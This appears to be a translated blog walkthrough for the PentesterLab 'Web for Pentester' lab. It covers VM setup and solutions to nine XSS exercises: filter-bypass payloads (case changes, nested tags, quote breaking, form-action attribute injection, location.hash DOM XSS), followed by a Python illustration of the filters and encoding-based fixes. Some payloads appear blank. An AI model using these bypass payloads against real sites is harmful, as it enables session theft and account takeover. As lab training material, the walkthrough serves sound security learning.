Web for Pentester is a penetration testing practice platform developed by foreign security researchers that lets you learn the detection techniques for common web vulnerabilities.
Download link and documentation:
http://pentesterlab.com/exercises/web_for_pentester/
"Installation Process"
1. Mount the image in the virtual machine. After downloading the ISO image, create a new system in the virtual machine.
Accept the defaults all the way through to create the virtual system.
Click Start and select the ISO image to boot from it.
2. Set up the network. Shut down the system you just started.
Click Settings, select the Network options, and configure the network.
3. Start the system and enter ifconfig.
You can see that the IP address of our virtual machine is 192.168.56.101 (it may differ on other systems).
If you want the host to access the virtual machine, the host and the virtual machine must be in the same network segment.
So open the Network and Sharing Center on the host and set the IP.
Based on my virtual machine's IP, the IP I set for this machine is as follows:
4. Enter the virtual machine's IP in the host browser (mine is http://192.168.56.101/); you can now access the virtual machine over HTTP!!
"XSS Section Walkthrough"
XSS example 1:
No filtering or encoding at all; anything goes ~
name=<script>alert('BB')</script>
XSS example 2:
Here you can see that the <script> tag is filtered out. Let's try changing the case.
name=<script>alert('BB')</sCript>
Well, the case change bypasses it.
XSS example 3:
As in the previous picture, the <script> tag is filtered out.
First try name=la<script>la; the output is Hello,lala
name=<scri<script>pt>alert('BB')</scri</script>pt>
I tested it, and this also works on example 2.
XSS example 4:
First enter the most basic test, name=<script>alert('BB')</script>
Unexpectedly, the output is Error!
Try a different tag? name=: no error this time. Now complete the full tag ~
name=
Success ~~ I tested this payload on the first three examples and it should work there too.
XSS example 5:
Enter name= first; it displays normally.
Completing it, name=, outputs Error
It turns out alert is filtered out -- but other functions can be used,
for example name=
I checked the documentation and found it can also be written like this.
name=
This world is so magical.
XSS example 6:
Inspect the element and discover that the output lands inside a script tag.
$a = " '
If the output is inside a script tag, close the double quotes first.
name=fdf"; alert($a);//
XSS example 7:
Inspect the element:
<script>
var $a = 'fdf"; alert($a);//';
</script>
I found that the double quotes were HTML-encoded.
-- I also noticed that $a = ' here uses single quotes ... so change it a little.
name=fdf'; alert($a);//
It becomes:
XSS example 8:
Yo, finally something bigger: this one is stored XSS ~
Randomly enter a name, <script>alert('a')</script>
Inspect the element
HELLO <script>alert('a')</script>
< and > have been HTML-encoded.
Such filtering is sufficient for content output into the HTML body. So where is the hole?
A hint from the answer: we find that the target URL of the form can be controlled
http://192.168.56.101/xss/example8.php/%22%20onsubmit=%22alert('1')
The pop-up is triggered when the form is submitted
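As an added illustration (not from this page or from PentesterLab's own code), the following Python models the two blacklist filters bypassed in examples 2 and 3 beside the output encoding that actually neutralises those payloads, including the JavaScript-string context from examples 6 and 7. The function names and the payload strings are constructed for this example.

```python
import html
import json
import re

# Constructed payloads mirroring the ones walked through above.
PAYLOADS = {
    "plain": "<script>alert('BB')</script>",
    "case": "<sCript>alert('BB')</sCript>",
    "nested": "<scri<script>pt>alert('BB')</scri</script>pt>",
}


def filter_example2(name):
    """Blacklist as in example 2: case-sensitive removal of the literal tag."""
    return name.replace("<script>", "").replace("</script>", "")


def filter_example3(name):
    """Blacklist as in example 3: case-insensitive, but only a single pass."""
    return re.sub(r"</?script>", "", name, flags=re.IGNORECASE)


def contains_script_tag(text):
    """Detection helper: does a <script ...> tag survive in the output?"""
    return re.search(r"<script\b", text, re.IGNORECASE) is not None


def render_html(name):
    """Hardened for an HTML text context: encode instead of stripping."""
    return "Hello " + html.escape(name, quote=True)


def render_js_string(name):
    """Hardened for the example 6/7 context (value inside a JS string).
    json.dumps yields a double-quoted JS string literal with quotes and
    backslashes escaped; '<' and '/' are escaped too so that '</script>'
    can never terminate the enclosing tag."""
    literal = json.dumps(name).replace("<", "\\u003c").replace("/", "\\/")
    return "<script>var $a = " + literal + ";</script>"


if __name__ == "__main__":
    for label, p in PAYLOADS.items():
        print(label, "example2 ->", contains_script_tag(filter_example2(p)))
        print(label, "example3 ->", contains_script_tag(filter_example3(p)))
        print(label, "encoded  ->", contains_script_tag(render_html(p)))
    print(render_js_string("fdf'; alert($a);//"))
```

The case-changed payload survives the example 2 filter and the nested payload reassembles itself after the example 3 filter's single pass, while both encoders leave nothing for the browser to execute.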
XSS example 9:
-- The last one, are you kidding me?
Inspect the element
<script>
document.write(location.hash.substring(1));
</script>
Just change it accordingly: http://192.168.56.101/xss/example9.php#<script>alert('1')</script>
Note: official answer address: http://files.pentesterlab.com/web_for_pentester/web_for_pentester.pdf
"Web Security" Part 3: Web defense platform Pentester installation and XSS section answer analysis